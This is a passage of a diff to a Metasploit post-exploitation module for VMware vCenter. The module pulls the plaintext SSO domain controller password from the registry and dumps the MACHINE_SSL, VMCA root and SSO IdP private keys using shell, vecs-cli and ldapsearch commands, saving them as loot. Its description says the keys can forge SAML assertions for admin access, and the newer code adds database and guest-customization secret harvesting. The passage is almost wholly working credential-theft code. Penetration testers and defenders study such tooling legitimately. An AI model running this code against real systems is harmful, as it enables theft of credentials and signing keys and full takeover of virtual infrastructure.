+      OptBool.new('SSL', [ false, 'Enable SSL on the LDAP connection' ]),
+      OptString.new('BASE_DN', [ false, 'Base DN to target on LDAP server' ]),
+      OptString.new('BASE_FQDN', [ false, 'Base FQDN to target on LDAP server' ]),
+      OptString.new('BIND_DN', [ false, 'The username to authenticate to LDAP server' ]),
+      OptString.new('BIND_PW', [ false, 'Password for the BIND_DN' ]),
+      OptString.new('VCENTER_FQDN', [ false, 'FQDN of the vCenter Server' ])
+    ])
+  end
+
+  def rhosts
+    datastore['RHOSTS']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def base_dn
+    datastore['BASE_DN']
+  end
+
+  def base_fqdn
+    datastore['BASE_FQDN']
+  end
+
+  def bind_dn
+    datastore['BIND_DN']
+  end
+
+  def bind_pw
+    datastore['BIND_PW']
+  end
+
+  def ldap_url
+    datastore['LDAP_URL']
+  end
+
+  def vcenter_fqdn
+    datastore['VCENTER_FQDN']
+  end
+
+  def ssl
+    datastore['SSL']
+  end
+
+  def run
+    print_status('Gathering vSphere SSO Domain Information ...')
+    unless vmdir_init
+      print_error('Unable to contact vmdir')
+      return
+    end
+
+    print_status('Extracting certificates from vSphere platform ...')
+    unless vmafd_dump
+      print_error('Unable to dump vmafd')
+      return
+    end
+  end
+
+  def vmdir_init
+    if !command_exists?('/usr/lib/vmware-vmafd/bin/vmafd-cli') && !command_exists?('/opt/likewise/bin/lwregshell')
+      print_error('Host does not appear to be a vSphere Platform Services Controller')
+      return false
+    end
+
+    vsphere_machine_id = cmd_exec('/usr/lib/vmware-vmafd/bin/vmafd-cli get-machine-id --server-name localhost')
+    unless validate_uuid(vsphere_machine_id)
+      print_error('Invalid vSphere PSC Machine UUID returned from vmafd-cli!')
+      return false
+    end
+
+    vprint_status("vSphere Machine ID: #{vsphere_machine_id}")
+
+    vsphere_machine_hostname = cmd_exec('hostname')
+    datastore['VCENTER_FQDN'] = vsphere_machine_hostname
+
+    vsphere_machine_ipv4 = cmd_exec('ifconfig | grep eth0 -A1 | grep "inet addr" | awk -F \':\' \'{print $2}\' | awk -F \' \' \'{print $1}\'')
+
+    unless validate_ipv4(vsphere_machine_ipv4)
+      print_error('Could not determine vCenter eth0 IPv4!')
+      return false
+    end
+
+    datastore['RHOSTS'] = vsphere_machine_ipv4
+
+    vprint_status("vSphere Hostname and IPv4: #{vcenter_fqdn} [#{vsphere_machine_ipv4}]")
+
+    vsphere_domain_name = cmd_exec('/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmafd\Parameters]\'|grep DomainName|awk \'{print $4}\'|tr -d \'"\'')
+
+    unless validate_fqdn(vsphere_domain_name)
+      print_error('Could not determine vSphere SSO domain name!')
+      return false
+    end
+
+    datastore['BASE_FQDN'] = vsphere_domain_name.to_s.downcase
+    vprint_status("vSphere SSO Domain FQDN: #{base_fqdn}")
+
+    vsphere_domain_dn = 'dc=' + base_fqdn.split('.').join(',dc=')
+    datastore['BASE_DN'] = vsphere_domain_dn
+    vprint_status("vSphere SSO Domain DN: #{base_dn}")
+
+    print_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
+    vsphere_domain_dc_dn = cmd_exec('/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountDN|awk \'{$1=$2=$3="";print $0}\'|tr -d \'"\'|sed -e \'s/^[ \t]*//\'')
+
+    unless validate_dn(vsphere_domain_dc_dn)
+      print_error('Could not determine vmdir dcAccountDN from lwregshell!')
+      return false
+    end
+
+    datastore['BIND_DN'] = vsphere_domain_dc_dn
+    print_good("vSphere SSO DC DN: #{bind_dn}")
+
+    # The DC machine account credential is stored in plaintext within the registry!
+    vsphere_domain_dc_pw = cmd_exec('printf $(/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountPassword|awk \'{print $4}\'|cut -c2-|rev|cut -c2-|rev)')
+
+    unless vsphere_domain_dc_pw
+      print_error('No dcAccountPassword credential returned from lwregshell query')
+      return false
+    end
+
+    datastore['BIND_PW'] = vsphere_domain_dc_pw
+    print_good("vSphere SSO DC PW: #{bind_pw}")
+
+    unless save_vmdir_credential
+      vprint_error('Unable to save credential to DB')
+    end
+
+    return true
+  end
+
+  def vmafd_dump
+    if !command_exists?('/usr/lib/vmware-vmafd/bin/vecs-cli')
+      print_error('Could not find vecs-cli')
+      return false
+    end
+
+    shell_bind_pw = bind_pw.gsub('"', '\"')
+
+    idp_keys = []
+    idp_certs = []
+
+    vprint_status('Extract MACHINE_SSL_CERT key ...')
+    vcenter_machine_key_b64 = cmd_exec('/usr/lib/vmware-vmafd/bin/vecs-cli entry getkey --store MACHINE_SSL_CERT --alias __MACHINE_CERT')
+
+    unless (vcenter_machine_key = OpenSSL::PKey::RSA.new(vcenter_machine_key_b64))
+      print_error('Could not extract MACHINE_SSL_CERT private key')
+      return false
+    end
+
+    vprint_status('Extract MACHINE_SSL_CERT cert ...')
+    vcenter_machine_cert_b64 = cmd_exec('/usr/lib/vmware-vmafd/bin/vecs-cli entry getcert --store MACHINE_SSL_CERT --alias __MACHINE_CERT')
+
+    unless (vcenter_machine_cert = OpenSSL::X509::Certificate.new(vcenter_machine_cert_b64))
+      print_error('Could not extract MACHINE_SSL_CERT certificate')
+      return false
+    end
+
+    unless vcenter_machine_cert.check_private_key(vcenter_machine_key)
+      print_error('MACHINE_SSL_CERT certificate and private key mismatch!')
+      return false
+    end
+
+    vprint_status('Extract VMCA_ROOT key ...')
+    vmca_key_b64 = cmd_exec('cat /var/lib/vmware/vmca/privatekey.pem')
+
+    unless (vmca_key = OpenSSL::PKey::RSA.new(vmca_key_b64))
+      print_error('Could not extract VMCA_ROOT private key')
+      return false
+    end
+
+    vprint_status('Extract VMCA_ROOT cert ...')
+    vmca_cert_b64 = cmd_exec('cat /var/lib/vmware/vmca/root.cer')
+
+    unless (vmca_cert = OpenSSL::X509::Certificate.new(vmca_cert_b64))
+      print_error('Could not extract VMCA_ROOT certificate')
+      return false
+    end
+
+    unless vmca_cert.check_private_key(vmca_key)
+      print_error('VMCA_ROOT certificate and private key mismatch!')
+      return false
+    end
+
+    print_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
+
+    shell_cmd = "/opt/likewise/bin/ldapsearch -h localhost -LLL -p 389 -b \"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\" -D \"#{bind_dn}\" -w \"#{shell_bind_pw}\" \"(objectclass=vmwSTSTenantCredential)\" vmwSTSPrivateKey | awk '/vmwSTSPrivateKey/,0'| sed -r 's/\\s+//g' | tr -d \"\\n\" | sed 's/vmwSTSPrivateKey::/\\n/g'"
+
+    # I'm aware of the irony and there is probably a better way
+    idp_key = cmd_exec(shell_cmd).strip!
+    keycol = "#{idp_key}\n"
+    keycol.each_line do |line|
+      b64formatted = line.scan(/.{1,64}/).join("\n")
+      idp_key_b64 = "-----BEGIN PRIVATE KEY-----\n#{b64formatted}\n-----END PRIVATE KEY-----"
+      unless (privkey = OpenSSL::PKey::RSA.new(idp_key_b64))
+        print_error('Error processing IdP trusted certificate private key')
+        return false
+      end
+      idp_keys << privkey
+    end
+
+    shell_cmd = "/opt/likewise/bin/ldapsearch -h localhost -LLL -p 389 -b \"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\" -D \"#{bind_dn}\" -w \"#{shell_bind_pw}\" \"(objectclass=vmwSTSTenantCredential)\" userCertificate | awk '/userCertificate/,0'| sed -r 's/\\s+//g' | tr -d \"\\n\" | sed 's/userCertificate::/\\n/g'"
+
+    idp_chain = cmd_exec(shell_cmd).strip!
+    certcol = "#{idp_chain}\n"
+    certcol.each_line do |line|
+      b64formatted = line.scan(/.{1,64}/).join("\n")
+      idp_cert_b64 = "-----BEGIN CERTIFICATE-----\n#{b64formatted}\n-----END CERTIFICATE-----"
+      unless (idp_cert = OpenSSL::X509::Certificate.new(idp_cert_b64))
+        print_error('Error processing IdP trusted certificate chain')
+        return false
+      end
+      idp_certs << idp_cert
+    end
+
+    sts_pem = nil
+    sts_cert = nil
+    sts_key = nil
+
+    print_status('Parsing vmwSTSTenantCredential certificates and keys ...')
+
+    # vCenter vmdir stores the STS IdP signing credential under the following DN:
+    #    cn=TenantCredential-1,cn=<sso domain>,cn=Tenants,cn=IdentityManager,cn=Services,<root dn>
+    #
+    # TODO: Right now this returns only the first valid keypair that is found and stops iterating
+    #      or dies if no valid keypair is located. This is fine for 99% of cases but complex or
+    #      unusual environments may have more than one TenantCredential and currently we stop
+    #      extracting keys at the first valid pair.
+
+    idp_keys.each do |stskey|
+      idp_certs.each do |stscert|
+        next unless stscert.check_private_key(stskey)
+
+        sts_cert = stscert.to_pem.to_s
+        sts_key = stskey.to_pem.to_s
+        unless validate_sts_cert(sts_cert) # Query IDM to compare our extracted cert with the IDM advertised cert
+          print_error('vCenter STS IdP cert extracted from vmdir does not match STS IdP cert chain advertised by IDM!')
+          return false
+        end
+        print_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')
+        sts_pem = "#{sts_key}#{sts_cert}"
+      end
+    end
+
+    unless sts_pem # We were unable to link a public and private key together
+      print_error('SSO_STS_IDP certificate and private key mismatch!')
+      return false
+    end
+
+    # The loot is GOOD, and it is ours
+    print_good('=> CHA-CHING! <=')
+
+    machine_pem = "#{vcenter_machine_key.to_pem}#{vcenter_machine_cert.to_pem}"
+
+    p = store_loot('ssl', 'PEM', rhosts, vcenter_machine_key.to_pem.to_s, 'MACHINE_SSL.key', 'vCenter MACHINE_SSL private key')
+    print_good("MACHINE_SSL_KEY: #{p}")
+
+    p = store_loot('ssl', 'PEM', rhosts, vcenter_machine_cert.to_pem.to_s, 'MACHINE_SSL.pem', 'vCenter MACHINE_SSL certificate')
+    print_good("MACHINE_SSL_CERT: #{p}")
+
+    vprint_good("MACHINE_SSL:\n#{machine_pem}")
+
+    vmca_pem = "#{vmca_key.to_pem}#{vmca_cert.to_pem}"
+
+    p = store_loot('vmca', 'PEM', rhosts, vmca_key.to_pem.to_s, 'VMCA_ROOT.key', 'vCenter VMCA private key')
+    print_good("VMCA_ROOT_KEY: #{p}")
+
+    p = store_loot('vmca', 'PEM', rhosts, vmca_cert.to_pem.to_s, 'VMCA_ROOT.pem', 'vCenter VMCA certificate')
+    print_good("VMCA_ROOT_CERT: #{p}")
+
+    vprint_good("VMCA_ROOT:\n#{vmca_pem}")
+
+    p = store_loot('idp', 'PEM', rhosts, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
+    print_good("SSO_STS_IDP_KEY: #{p}")
+
+    p = store_loot('idp', 'PEM', rhosts, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
+    print_good("SSO_STS_IDP_CERT: #{p}")
+
+    vprint_good("SSO_STS_IDP:\n#{sts_pem}")
+
+    return true
+  end
+
+  def validate_uuid(uuid)
+    uuid_regex = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
+    return true if uuid_regex.match?(uuid.to_s.downcase)
+
+    return false
+  end
+
+  def validate_ipv4(ipv4)
+    ip = IPAddr.new ipv4.to_s
+    unless ip
+      return false
+    end
+
+    return true
+  end
+
+  def validate_fqdn(fqdn)
+    fqdn_regex = /(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{0,62}[a-zA-Z0-9]\.)+[a-zA-Z]{2,63}$)/
+    return true if fqdn_regex.match?(fqdn.to_s.downcase)
+
+    return false
+  end
+
+  def validate_dn(dn)
+    dn_regex = /^(?:(?<cn>cn=(?<name>[^,]*)),)?(?:(?<path>(?:(?:cn|ou)=[^,]+,?)+),)?(?<domain>(?:dc=[^,]+,?)+)$/
+    return true if dn_regex.match?(dn.to_s.downcase)
+
+    return false
+  end
+
+  def validate_sts_cert(test_cert)
+    unless (cert = OpenSSL::X509::Certificate.new(test_cert))
+      print_error('Invalid x509 certificate received!')
+      return false
+    end
+
+    vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...')
+
+    idm_cmd = cmd_exec("curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT")
+
+    unless (idm_json = JSON.parse(idm_cmd).first)
+      print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')
+      return false
+    end
+
+    idm_json['certificates'].each do |idm|
+      unless (cert_verify = OpenSSL::X509::Certificate.new(idm['encoded']))
+        print_error('Invalid x509 certificate extracted from IDM!')
+        return false
+      end
+
+      unless cert == cert_verify
+        next
+      end
+
+      return true
+    end
+
+    vprint_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')
+
+    return false
+  end
+
+  def save_vmdir_credential
+    service_data = {
+      address: Rex::Socket.getaddress(rhosts),
+      port: rport,
+      service_name: (ssl ? 'ldaps' : 'ldap'),
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      realm_value: base_fqdn,
+      username: bind_dn,
+      private_type: :password,
+      private_data: bind_pw
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data)
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+end

--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post
           domain via standard LDAP interface; good for plugging into the
           vmware_vcenter_vmdir_ldap module or for adding new SSO admin
           users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with
-          assocaited private keys are also plundered and can be used to
+          associated private keys are also plundered and can be used to
           sign forged SAML assertions for the /ui admin interface.
         },
         'Author' => 'npm[at]cesium137.io',
@@ -54,229 +54,167 @@ class MetasploitModule < Msf::Post
         'Privileged' => true
       )
     )
-
-    register_advanced_options([
-      OptString.new('RHOSTS', [ false, 'The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit' ]),
-      OptPort.new('RPORT', [ false, 'The target port', 389 ]),
-      OptBool.new('SSL', [ false, 'Enable SSL on the LDAP connection' ]),
-      OptString.new('BASE_DN', [ false, 'Base DN to target on LDAP server' ]),
-      OptString.new('BASE_FQDN', [ false, 'Base FQDN to target on LDAP server' ]),
-      OptString.new('BIND_DN', [ false, 'The username to authenticate to LDAP server' ]),
-      OptString.new('BIND_PW', [ false, 'Password for the BIND_DN' ]),
-      OptString.new('VCENTER_FQDN', [ false, 'FQDN of the vCenter Server' ])
-    ])
-  end
-
-  def rhosts
-    datastore['RHOSTS']
-  end
-
-  def rport
-    datastore['RPORT']
-  end
-
-  def base_dn
-    datastore['BASE_DN']
-  end
-
-  def base_fqdn
-    datastore['BASE_FQDN']
-  end
-
-  def bind_dn
-    datastore['BIND_DN']
-  end
-
-  def bind_pw
-    datastore['BIND_PW']
-  end
-
-  def ldap_url
-    datastore['LDAP_URL']
-  end
-
-  def vcenter_fqdn
-    datastore['VCENTER_FQDN']
-  end
-
-  def ssl
-    datastore['SSL']
   end
 
   def run
+    validate_target
+
     print_status('Gathering vSphere SSO Domain Information ...')
-    unless vmdir_init
-      print_error('Unable to contact vmdir')
-      return
-    end
+    vmdir_init
 
     print_status('Extracting certificates from vSphere platform ...')
-    unless vmafd_dump
-      print_error('Unable to dump vmafd')
-      return
-    end
+    vmafd_dump
+
+    print_status('Extracting PostgreSQL database credentials ...')
+    get_db_creds
+
+    print_status('Searching for secrets in VM Guest Customization Specification XML ...')
+    enum_vm_cust_spec
   end
 
   def vmdir_init
-    if !command_exists?('/usr/lib/vmware-vmafd/bin/vmafd-cli') && !command_exists?('/opt/likewise/bin/lwregshell')
-      print_error('Host does not appear to be a vSphere Platform Services Controller')
-      return false
-    end
-
     vsphere_machine_id = cmd_exec('/usr/lib/vmware-vmafd/bin/vmafd-cli get-machine-id --server-name localhost')
-    unless validate_uuid(vsphere_machine_id)
-      print_error('Invalid vSphere PSC Machine UUID returned from vmafd-cli!')
-      return false
+    if validate_uuid(vsphere_machine_id)
+      vprint_status("vSphere Machine ID: #{vsphere_machine_id}")
+    else
+      fail_with(Msf::Exploit::Failure::Unknown, 'Invalid vSphere PSC Machine UUID returned from vmafd-cli')
     end
-
-    vprint_status("vSphere Machine ID: #{vsphere_machine_id}")
 
     vsphere_machine_hostname = cmd_exec('hostname')
-    datastore['VCENTER_FQDN'] = vsphere_machine_hostname
+    @vcenter_fqdn = vsphere_machine_hostname
 
     vsphere_machine_ipv4 = cmd_exec('ifconfig | grep eth0 -A1 | grep "inet addr" | awk -F \':\' \'{print $2}\' | awk -F \' \' \'{print $1}\'')
-
-    unless validate_ipv4(vsphere_machine_ipv4)
-      print_error('Could not determine vCenter eth0 IPv4!')
-      return false
+    if validate_ipv4(vsphere_machine_ipv4)
+      print_status("vSphere Hostname and IPv4: #{@vcenter_fqdn} [#{vsphere_machine_ipv4}]")
+    else
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vCenter eth0 IPv4!')
     end
-
-    datastore['RHOSTS'] = vsphere_machine_ipv4
-
-    vprint_status("vSphere Hostname and IPv4: #{vcenter_fqdn} [#{vsphere_machine_ipv4}]")
 
     vsphere_domain_name = cmd_exec('/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmafd\Parameters]\'|grep DomainName|awk \'{print $4}\'|tr -d \'"\'')
-
     unless validate_fqdn(vsphere_domain_name)
-      print_error('Could not determine vSphere SSO domain name!')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vSphere SSO domain name via lwregshell')
     end
 
-    datastore['BASE_FQDN'] = vsphere_domain_name.to_s.downcase
-    vprint_status("vSphere SSO Domain FQDN: #{base_fqdn}")
+    @base_fqdn = vsphere_domain_name.to_s.downcase
+    vprint_status("vSphere SSO Domain FQDN: #{@base_fqdn}")
 
-    vsphere_domain_dn = 'dc=' + base_fqdn.split('.').join(',dc=')
-    datastore['BASE_DN'] = vsphere_domain_dn
-    vprint_status("vSphere SSO Domain DN: #{base_dn}")
+    vsphere_domain_dn = 'dc=' + @base_fqdn.split('.').join(',dc=')
+    @base_dn = vsphere_domain_dn
+    vprint_status("vSphere SSO Domain DN: #{@base_dn}")
 
-    print_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
+    vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
+
     vsphere_domain_dc_dn = cmd_exec('/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountDN|awk \'{$1=$2=$3="";print $0}\'|tr -d \'"\'|sed -e \'s/^[ \t]*//\'')
-
     unless validate_dn(vsphere_domain_dc_dn)
-      print_error('Could not determine vmdir dcAccountDN from lwregshell!')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')
     end
 
-    datastore['BIND_DN'] = vsphere_domain_dc_dn
-    print_good("vSphere SSO DC DN: #{bind_dn}")
+    @bind_dn = vsphere_domain_dc_dn
+    print_good("vSphere SSO DC DN: #{@bind_dn}")
 
-    # The DC machine account credential is stored in plaintext within the registry!
-    vsphere_domain_dc_pw = cmd_exec('printf $(/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountPassword|awk \'{print $4}\'|cut -c2-|rev|cut -c2-|rev)')
-
-    unless vsphere_domain_dc_pw
-      print_error('No dcAccountPassword credential returned from lwregshell query')
-      return false
+    @bind_pw = cmd_exec('printf $(/opt/likewise/bin/lwregshell list_values \'[HKEY_THIS_MACHINE\Services\vmdir]\'|grep dcAccountPassword|awk \'{print $4}\'|cut -c2-|rev|cut -c2-|rev)')
+    unless @bind_pw
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')
     end
 
-    datastore['BIND_PW'] = vsphere_domain_dc_pw
-    print_good("vSphere SSO DC PW: #{bind_pw}")
+    print_good("vSphere SSO DC PW: #{@bind_pw}")
 
-    unless save_vmdir_credential
-      vprint_error('Unable to save credential to DB')
-    end
+    extra_service_data = {
+      address: Rex::Socket.getaddress(rhost),
+      port: 389,
+      service_name: 'ldap',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      realm_value: @base_fqdn
+    }
 
-    return true
+    store_valid_credential(user: @bind_dn, private: @bind_pw, service_data: extra_service_data)
   end
 
   def vmafd_dump
-    if !command_exists?('/usr/lib/vmware-vmafd/bin/vecs-cli')
-      print_error('Could not find vecs-cli')
-      return false
-    end
+    get_vmca_cert
+    get_idp_cert
 
-    shell_bind_pw = bind_pw.gsub('"', '\"')
-
-    idp_keys = []
-    idp_certs = []
-
-    vprint_status('Extract MACHINE_SSL_CERT key ...')
-    vcenter_machine_key_b64 = cmd_exec('/usr/lib/vmware-vmafd/bin/vecs-cli entry getkey --store MACHINE_SSL_CERT --alias __MACHINE_CERT')
-
-    unless (vcenter_machine_key = OpenSSL::PKey::RSA.new(vcenter_machine_key_b64))
-      print_error('Could not extract MACHINE_SSL_CERT private key')
-      return false
-    end
-
-    vprint_status('Extract MACHINE_SSL_CERT cert ...')
-    vcenter_machine_cert_b64 = cmd_exec('/usr/lib/vmware-vmafd/bin/vecs-cli entry getcert --store MACHINE_SSL_CERT --alias __MACHINE_CERT')
-
-    unless (vcenter_machine_cert = OpenSSL::X509::Certificate.new(vcenter_machine_cert_b64))
-      print_error('Could not extract MACHINE_SSL_CERT certificate')
-      return false
-    end
+    vcenter_machine_key = get_vecs_entry('getkey', 'MACHINE_SSL_CERT', '__MACHINE_CERT', 'ssl')
+    vcenter_machine_cert = get_vecs_entry('getcert', 'MACHINE_SSL_CERT', '__MACHINE_CERT', 'ssl')
 
     unless vcenter_machine_cert.check_private_key(vcenter_machine_key)
-      print_error('MACHINE_SSL_CERT certificate and private key mismatch!')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'MACHINE_SSL_CERT certificate and private key mismatch!')
     end
 
+    vcenter_encipherment_key = get_vecs_entry('getkey', 'data-encipherment', 'data-encipherment', 'data')
+    vcenter_encipherment_cert = get_vecs_entry('getcert', 'data-encipherment', 'data-encipherment', 'data')
+
+    unless vcenter_encipherment_cert.check_private_key(vcenter_encipherment_key)
+      fail_with(Msf::Exploit::Failure::Unknown, 'DATA-ENCIPHERMENT certificate and private key mismatch!')
+    end
+
+    @vc_cipher_key = vcenter_encipherment_key
+  end
+
+  def get_vmca_cert
     vprint_status('Extract VMCA_ROOT key ...')
     vmca_key_b64 = cmd_exec('cat /var/lib/vmware/vmca/privatekey.pem')
 
     unless (vmca_key = OpenSSL::PKey::RSA.new(vmca_key_b64))
-      print_error('Could not extract VMCA_ROOT private key')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not extract VMCA_ROOT private key')
     end
+
+    p = store_loot('vmca', 'PEM', rhost, vmca_key, 'VMCA_ROOT.key', 'vCenter VMCA root CA private key')
+    print_good("VMCA_ROOT key: #{p}")
 
     vprint_status('Extract VMCA_ROOT cert ...')
     vmca_cert_b64 = cmd_exec('cat /var/lib/vmware/vmca/root.cer')
 
     unless (vmca_cert = OpenSSL::X509::Certificate.new(vmca_cert_b64))
-      print_error('Could not extract VMCA_ROOT certificate')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not extract VMCA_ROOT certificate')
     end
 
     unless vmca_cert.check_private_key(vmca_key)
-      print_error('VMCA_ROOT certificate and private key mismatch!')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'VMCA_ROOT certificate and private key mismatch!')
     end
 
-    print_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
+    p = store_loot('vmca', 'PEM', rhost, vmca_cert, 'VMCA_ROOT.pem', 'vCenter VMCA root CA certificate')
+    print_good("VMCA_ROOT cert: #{p}")
+  end
 
-    shell_cmd = "/opt/likewise/bin/ldapsearch -h localhost -LLL -p 389 -b \"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\" -D \"#{bind_dn}\" -w \"#{shell_bind_pw}\" \"(objectclass=vmwSTSTenantCredential)\" vmwSTSPrivateKey | awk '/vmwSTSPrivateKey/,0'| sed -r 's/\\s+//g' | tr -d \"\\n\" | sed 's/vmwSTSPrivateKey::/\\n/g'"
+  def get_idp_cert
+    shell_bind_pw = @bind_pw.gsub('"', '\"')
 
-    # I'm aware of the irony and there is probably a better way
+    vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...')
+
+    shell_cmd = "/opt/likewise/bin/ldapsearch -h localhost -LLL -p 389 -b \"cn=#{@base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{@base_dn}\" -D \"#{@bind_dn}\" -w \"#{shell_bind_pw}\" \"(objectclass=vmwSTSTenantCredential)\" vmwSTSPrivateKey | awk '/vmwSTSPrivateKey/,0'| sed -r 's/\\s+//g' | tr -d \"\\n\" | sed 's/vmwSTSPrivateKey::/\\n/g'"
+
+    idp_keys = []
     idp_key = cmd_exec(shell_cmd).strip!
     keycol = "#{idp_key}\n"
     keycol.each_line do |line|
       b64formatted = line.scan(/.{1,64}/).join("\n")
       idp_key_b64 = "-----BEGIN PRIVATE KEY-----\n#{b64formatted}\n-----END PRIVATE KEY-----"
       unless (privkey = OpenSSL::PKey::RSA.new(idp_key_b64))
-        print_error('Error processing IdP trusted certificate private key')
-        return false
+        fail_with(Msf::Exploit::Failure::Unknown, 'Error processing IdP trusted certificate private key')
       end
       idp_keys << privkey
     end
 
-    shell_cmd = "/opt/likewise/bin/ldapsearch -h localhost -LLL -p 389 -b \"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\" -D \"#{bind_dn}\" -w \"#{shell_bind_pw}\" \"(objectclass=vmwSTSTenantCredential)\" userCertificate | awk '/userCertificate/,0'| sed -r 's/\\s+//g' | tr -d \"\\n\" | sed 's/userCertificate::/\\n/g'"
+    shell_cmd = "/opt/likewise/bin/ldapsearch -h localhost -LLL -p 389 -b \"cn=#{@base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{@base_dn}\" -D \"#{@bind_dn}\" -w \"#{shell_bind_pw}\" \"(objectclass=vmwSTSTenantCredential)\" userCertificate | awk '/userCertificate/,0'| sed -r 's/\\s+//g' | tr -d \"\\n\" | sed 's/userCertificate::/\\n/g'"
 
+    idp_certs = []
     idp_chain = cmd_exec(shell_cmd).strip!
     certcol = "#{idp_chain}\n"
     certcol.each_line do |line|
       b64formatted = line.scan(/.{1,64}/).join("\n")
       idp_cert_b64 = "-----BEGIN CERTIFICATE-----\n#{b64formatted}\n-----END CERTIFICATE-----"
       unless (idp_cert = OpenSSL::X509::Certificate.new(idp_cert_b64))
-        print_error('Error processing IdP trusted certificate chain')
-        return false
+        fail_with(Msf::Exploit::Failure::Unknown, 'Error processing IdP trusted certificate chain')
       end
       idp_certs << idp_cert
     end
 
-    sts_pem = nil
-    sts_cert = nil
-    sts_key = nil
-
-    print_status('Parsing vmwSTSTenantCredential certificates and keys ...')
+    vprint_status('Parsing vmwSTSTenantCredential certificates and keys ...')
 
     # vCenter vmdir stores the STS IdP signing credential under the following DN:
     #    cn=TenantCredential-1,cn=<sso domain>,cn=Tenants,cn=IdentityManager,cn=Services,<root dn>
@@ -286,65 +224,176 @@ class MetasploitModule < Msf::Post
     #      unusual environments may have more than one TenantCredential and currently we stop
     #      extracting keys at the first valid pair.
 
+    sts_cert = nil
+    sts_key = nil
+    sts_pem = nil
+
     idp_keys.each do |stskey|
       idp_certs.each do |stscert|
         next unless stscert.check_private_key(stskey)
 
         sts_cert = stscert.to_pem.to_s
         sts_key = stskey.to_pem.to_s
-        unless validate_sts_cert(sts_cert) # Query IDM to compare our extracted cert with the IDM advertised cert
-          print_error('vCenter STS IdP cert extracted from vmdir does not match STS IdP cert chain advertised by IDM!')
-          return false
+        if validate_sts_cert(sts_cert)
+          vprint_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')
+        else # Query IDM to compare our extracted cert with the IDM advertised cert
+          fail_with(Msf::Exploit::Failure::Unknown, 'Could not reconsile vmdir STS IdP cert chain with cert chain advertised by IDM')
         end
-        print_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')
         sts_pem = "#{sts_key}#{sts_cert}"
       end
     end
 
     unless sts_pem # We were unable to link a public and private key together
-      print_error('SSO_STS_IDP certificate and private key mismatch!')
-      return false
+      fail_with(Msf::Exploit::Failure::Unknown, 'Unable to associate IdP certificate and private key')
     end
 
-    # The loot is GOOD, and it is ours
-    print_good('=> CHA-CHING! <=')
+    p = store_loot('idp', 'PEM', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
+    print_good("SSO_STS_IDP key: #{p}")
 
-    machine_pem = "#{vcenter_machine_key.to_pem}#{vcenter_machine_cert.to_pem}"
+    p = store_loot('idp', 'PEM', rhost, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
+    print_good("SSO_STS_IDP cert: #{p}")
+  end
 
-    p = store_loot('ssl', 'PEM', rhosts, vcenter_machine_key.to_pem.to_s, 'MACHINE_SSL.key', 'vCenter MACHINE_SSL private key')
-    print_good("MACHINE_SSL_KEY: #{p}")
+  def get_vecs_entry(entry_type, store_name, entry_alias, loot_alias)
+    store_label = store_name.upcase
 
